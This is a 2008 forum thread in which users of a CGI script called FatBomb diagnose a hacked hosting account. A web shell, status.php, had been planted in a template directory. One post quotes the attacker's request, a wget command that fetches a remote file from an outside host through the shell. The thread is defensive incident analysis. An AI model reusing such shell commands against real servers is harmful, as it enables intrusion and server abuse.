|
Kurt
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points |
Jan-16-08, 10:01 AM (PST) |
    |
1. "RE: Hosting issue"
 |
Hi David, What is this?
http://megatroll.com/fatbomb-data/styles/status.php? This doesn't make any sense to me at all...It's not FatBomb. One, Fatty should be installed in the cgi-bin. Two, Fatty doesn't use a directory structure that includes /fatbomb-data Three, It doesn't have a "styles" directory. Four, And, it's not a php script. Fatty is a cgi script. What's this status.php reference? Your host has given no useful information, just a URL. Instead of a URL they need to provide some type of server error message.
-Boom boom boom boom.
|
|
|
Alert | IP |
Printer-friendly page | Edit |
Reply |
Reply With Quote |
|
|
tasari
Member since Dec-8-02
1752 posts, 1 feedbacks, 2 points |
Jan-16-08, 02:45 PM (PST) |
|
|
2. "RE: Hosting issue"
| |
LAST EDITED ON Jan-16-08 AT 02:50 PM (PST)
I had that issue many times on my server (different domains => not with Tuelz or Kurt's scripts)This is a way to overload your hosting account/server ! d=/home/sites/megatroll.com/public_html/fatbomb-data/styles/temp/&cmd=wget http://cashandassets.net/source/cb.txt This part is the cause... it gets a external file on an other host, but often this is a php file called here as text file. Often it does loop over and over, does load the server. Some questions...
1) Did you make yourself that directory "fatbomb-data"-directory ?
1a) If yes, where did you get it ? You need to alert them that their is a security issue with their script, at least with status.php
2a) If no, then you have a hacker that got access on your hosting account and created that directory to launch that url which causes the overload. Often hackers get access from A script installed there, but you need to look the php scripts, not kurt's ones, all are cgi or via Tuelz... Let us know  Tasari |
|
|
Alert | IP |
Printer-friendly page | Edit |
Reply |
Reply With Quote |
|
|
kiosk2
Member since Apr-10-06
Rate this user |
Jan-18-08, 10:17 AM (PST) |
|
|
3. "RE: Hosting issue"
| |
Hi I've had problems replying here. The script was installed by Kurts support guy/programmer after I purchased it and has remained pretty much as is as I couldn't get my head round the customization. What do I need to do to resolve it and if it has been hacked, is the script vulnerable? Thanks again. David |
|
|
Alert | IP |
Printer-friendly page | Edit |
Reply |
Reply With Quote |
|
|
kiosk2
Member since Apr-10-06
Rate this user |
Jan-18-08, 10:17 AM (PST) |
|
|
4. "RE: Hosting issue"
| |
Further to my last post - yes there were some dodgy php files that had been placed inside that folder (which has the templates in I think) I have deleted them (along with the templates folder - whoops, I have a back up at home though) and have asked the hosting company to re-enable scripting and to check how the site was hacked as there were no other scripts on the site other than Kurts which, as you say, are all cgi scripts. Thanks for your help. David PS - I WILL get round to setting the site to it's true potential one day!! |
|
|
Alert | IP |
Printer-friendly page | Edit |
Reply |
Reply With Quote |
|
|
Kurt
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points |
Jan-18-08, 10:21 AM (PST) |
|
|
5. "RE: Hosting issue"
|
Hi David, Tasari gave good advice above. I really can't give you any more advice since the problems seem to be associated with a php script and don't have anything to do with Fatty directly. I wish I could be more help but without moe info there's not a lot we can do on this end.
-Boom boom boom boom.
|
|
|
Alert | IP |
Printer-friendly page | Edit |
Reply |
Reply With Quote |
|
|
Kurt
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points |
Jan-22-08, 10:29 AM (PST) |
|
|
6. "RE: Hosting issue"
|
This is what Kirill has to say:
"The site was, indeed, hacked, but it does not seem to be related to
FatBomb. The directory 'fatbomb-data/styles' was created by me during installation, it holds images and CSS files that are used by default
fatbomb templates.
The PHP file has nothing to do with FatBomb though; it's a typical
hacker trick. When a hacker gets an ability to upload files to the
server, he usually uploads a script that allows him to run arbitrary
commands remotely. This script usually has some "typical" name, like
"status.php" is this case, and is uploaded to some place deep in the
filesystem tree. In this case, the attacker uploaded the script to
"fatbomb-data/styles" in hope that nobody would notice it for a long
time. I bet if the site owner reviews the other directories of the
site, he will find many other similar scripts with innocent names
allowing remote command execution. With regard to the script that was used to compromise the site
initially, i highly doubt it was FatBomb. 99% that it was an insecure
WordPress, phpBB2, or some other popular PHP program."
-Boom boom boom boom.
|
|
|
Alert | IP |
Printer-friendly page | Edit |
Reply |
Reply With Quote |
|
|
kiosk2
Member since Apr-10-06
Rate this user |
Jan-22-08, 02:46 PM (PST) |
|
|
7. "RE: Hosting issue"
| |
Thanks Fatbomb was/is the only script installed on the site. It is on a shared hosting server so it could have come via another site on there? At least we identified the offending stuff and it's working ok now. Just need to upload the styles folder again. Now where did I put it? Thanks again for your help. David |
|
|
Alert | IP |
Printer-friendly page | Edit |
Reply |
Reply With Quote |
|
|
|
Printer-friendly copy
